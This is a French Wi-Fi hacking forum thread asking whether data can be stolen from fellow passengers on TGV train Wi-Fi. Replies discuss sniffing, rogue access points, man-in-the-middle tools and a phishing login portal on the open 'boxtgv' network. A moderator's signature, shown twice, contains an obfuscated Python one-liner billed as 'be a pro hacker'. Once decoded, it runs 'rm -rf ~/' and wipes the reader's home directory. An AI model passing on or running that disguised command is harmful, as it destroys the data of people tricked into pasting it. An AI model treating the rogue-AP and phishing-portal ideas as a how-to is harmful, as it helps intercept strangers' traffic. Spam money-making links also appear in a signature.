Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-04-2012 23:29:31

phippaubert
Nouveau membre
Inscription : 18-04-2012
Messages : 5

Récupération de données dans un TGV

Bonjour a tous,

Il n'y a pas si longtemps de ça un reportage sur TF1 expliquait qu'il était possible de récupérer des données de pc environnant lorsqu'on est dans un TGV.

Ma première question est : Prenant le TGV régulièrement comment se protéger efficacement ? smile
MA seconde question : Quel est le procédé exactement ?

D'avance merci pour vos réponses

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-04-2012 08:41:06

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Récupération de données dans un TGV

Première réponse :
éteindre son antenne WiFi et sa puce bluetooth.

Deuxième réponse :  (  ℹ⃝ )
Il suffit d'écouter tout ce qui transite sur un certain canal de la bande WiFi, ou plus.
La problématique est la même que dans le cas d'un réseau WiFi normal.
Je ferais un peu de pentest sauvage dans le TGV un de ces 4, mais je crois que le WiFi n'est en service que sur strasbourg-paris ou un truc dans ce genre.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 19-04-2012 08:46:32

phippaubert
Nouveau membre
Inscription : 18-04-2012
Messages : 5

Re : Récupération de données dans un TGV

Merci Spawn pour ta réponse.
Sur le Strasbourg - Paris Il est fonctionnel mais uniquement en seconde classe via la BoxTGV smile Mais pas en 1ère classe .. Ou tout le monde utilise une clé 3G ou son Gsm.
Dans le reportage que j'évoquais, ils avaient l'air de dire que le pirate recuperer les données qu'en cryptées et que ca prenait des heures pour les decrypter une fois de retour " à la maison " pour voir ce qu'on avait pu récupérer ..

Tu confirmes ? smile

Hors Ligne

#4 20-04-2012 12:25:28

sanguinius
N00b
Inscription : 28-12-2011
Messages : 4

Re : Récupération de données dans un TGV

Salut, si j'étais toi je prendrais les informations donnés par la télé et notamment par TF1 avec des pincettes.
Tf1 sert une bouillasse d'informations compréhensible pour le commun des mortels, si tu as vu qu'on pouvait faire une attaque sur une box TGV ça me paraît être avec une technique MITM , en utilisant pourquoi pas une rogue AP. Bref dans toutes les attaques wi-fi tu décryptes rien du tout pendant des heures tout tombe en clair (sauf les mdp si tu fais juste du sniffing avec wireshark), donc moi ça me paraît assez bizarre que le "pirate" récupère tout ça en crypté et que cela nécessite des heures pour le récupérer...

Voilà après je pense que spawn pourra mieux répondre s'il a tester directement dans le tgv mais personnellement, je pense que les infos données par les médias sur la sécurité informatique sont vachement retravaillées/censurées, etc je pense par exemple que ça foutrait mal SNCF si TF1 balançait au journal de 20H qu'on peut récupérer tes mots de passes sur le réseau wifi d'un TGV avec un iphone smile voilà

P.S: c'est tout à fait faisable avec SET/ettercap d'ailleurs si je ne m'abuse ?

Hors Ligne

#5 20-04-2012 15:11:47

phippaubert
Nouveau membre
Inscription : 18-04-2012
Messages : 5

Re : Récupération de données dans un TGV

Merci sanguinius pour ta réponse. Meme si les termes MITM, rogue AP,  set/ettercap et wireshark me sont inconnus smile
Je ne me rappelle plus si le reportage provenait de TF1 ou autres mais il est bien évident que le pirate ( a visage caché ) parlait bien de cryptage et décryptage d'informations.
Nous ne parlons pas ici de cassage de clé wep pour utiliser le wifi de la boxtgv mais bel et bien de récupérer les données des passagers du meme wagon ...
Tu parles de snifing pour les mots de passe et de données en claires pour le reste .. Dans le reportage le pirate expliquait en fait qu'il récupérait toutes les données échangées et à 99% des mails ... Dans ce cas qu'en est il ? Cyptage ? Pas cryptage ? Sniffing ?
Merci d'avance pour vos réponses


PS : Je prends 1 fois par semaine le TGV PAris-Strasbourg donc je me propose de tester pour vous si un membre veut bien me servir de parrain pour la démarche a suivre smile A bon entendeur smile

Hors Ligne

#6 20-04-2012 17:23:30

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Récupération de données dans un TGV

Je penteste ça un de ces 4 et je vous dis ce qu'il en est.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#7 21-04-2012 20:03:45

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Re : Récupération de données dans un TGV

J'avais sniffé le réseau d'un TGV il y à bien 1ans de ça et d’après mes souvenirs c'était bien du WPA2(?)

Si quelqu'un possède un mot de passe périmé, il pourrais être assez instructif de voir comment celui-ci est composé.

+1 pour la Rogue AP ainsi qu'un peu d'avance sur le départ du train serait surement nécessaire à un pirate de TF1 ^^ wink

Comme le dit sanguinius (que je salut au passage) TF1 n'est pas forcement une bonne source d'info et j'imagine que beaucoup de gens ne les regardent que pour avoir un sujet de dialogue avec leur prochain wink


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

#8 23-04-2012 09:20:26

phippaubert
Nouveau membre
Inscription : 18-04-2012
Messages : 5

Re : Récupération de données dans un TGV

Merci Spawn et Vances.

Encore une fois, je ne parle pas ici de cassage de clé WEP ou WPA pour utiliser le wifi de la boxtgv mais bel et bien de récupérer les données des passagers du meme wagon ...

Il s'agit de récupérer les données échangées par les "voisins" et essentiellement les mails ... Dans ce cas comment cela est il possible ?

Hors Ligne

#9 23-04-2012 12:55:02

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Récupération de données dans un TGV

Oui... avec la clef du réseau WPA en question pour pouvoir déchiffrer le trafic et pouvoir y chercher les mails.
Ou alors on est face à un rogue AP et plus besoin de trouver la clef vu que c'est sur ton "fake" réseau que se connecte  la victime
Comprendre ce qu'est une Rogue AP et éviter les dangers liés aux hotspots wifi (man in the middle, ettercap, dnsspoof)

Hors Ligne

#10 23-04-2012 15:46:25

phippaubert
Nouveau membre
Inscription : 18-04-2012
Messages : 5

Re : Récupération de données dans un TGV

Si je comprends bien le principe du rogue AP il faut impérativement du matériel adapté. Or dans le reportage en question, le pirate n’utilisait QUE son portable pour récupérer les emails... Que peut on en deduire comme attaque utilisée ?

Hors Ligne

#11 23-04-2012 17:17:03

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Récupération de données dans un TGV

Il te suffit d'avoir un chipset compatible mode monitor ce qui te permet de travailler avec la suite aircrack-ng (pour faire un fake AP tu peux utiliser airbase-ng
Si ton portable n'est pas munis d'un chipset compatible (ce qui est presque de la malchance car beaucoup le sont) tu trouves de adaptateurs USB aux alentours de 10 € qui sont compatibles tongue

Hors Ligne

#12 23-06-2013 19:35:50

Lachemou
N00b
Inscription : 23-06-2013
Messages : 2

Re : Récupération de données dans un TGV

Bonjour a tous,

J ai fait un petit voyage en TGV ce week-end end et j ai essayé d analyser un peu ce wifi.

Tout d abord il n'y a qu un seul SSID déployé "boxtgv", pas de SSID caché. J ai sniffé avec wifite pour confirmer mes dires.

Ce réseau "boxtgv" n'est protégé par aucune clef, c'est du libre. Une fois connecté au wifi on arrive sur un portail de connection (ou l on peut voir les destinations du train ainsi que sa vitesse et 2-3 autres trucs). De ce portail on se connecte avec mail+mot de passe et on achète un pass : 1h 5€, connection tout le trajet 10€, connection 30 jours 30€.

J ai tenté de capturer avec wireshark avant de m apercevoir que le site portail est en https du coup chocolat pour moi.

Mes compétences étant plus que limites je me suis arrêter la, je ne sais pas si l on peut aller beaucoup loin ...

Voilà voilà si ça peut aider !

Hors Ligne

#13 23-06-2013 22:56:49

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Récupération de données dans un TGV

C'est de l'open dans les TGV alors? je croyais que l'option du wifi se réglé lors de l'achat du billet sur internet ou au guichet pour que le client reçoive son pass wpa pour se connecter dans le train par la suite.

Si c'est de l'open ça craint car n'importe qui peux créer une rogue AP ainsu qu'une fausse page d'admin et choper le mot de passe de connexion ainsi que beaucoup plus de choses en s'y prenant bien hmm

Hors Ligne

#14 24-06-2013 07:51:09

Lachemou
N00b
Inscription : 23-06-2013
Messages : 2

Re : Récupération de données dans un TGV

koala a écrit :

C'est de l'open dans les TGV alors?

=> Je confirme !!!

Pour la clef wpa lors de l'achat du billet, c'était peut être le cas avant mais ce n'est plus comme cela.

Enfin concernant le Rogue AP => il faut cependant avoir pas mal de notion de dev, afin de coder un portail "phising" pour récupérer les infos.

Hors Ligne

#15 24-06-2013 18:46:22

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Récupération de données dans un TGV

Enfin concernant le Rogue AP => il faut cependant avoir pas mal de notion de dev, afin de coder un portail "phising" pour récupérer les infos.

Avec le site du zéro par exemple, c'est faisable très rapidement wink

Hors Ligne

#16 24-06-2013 18:47:10

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Récupération de données dans un TGV

J'osais pas le dire wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]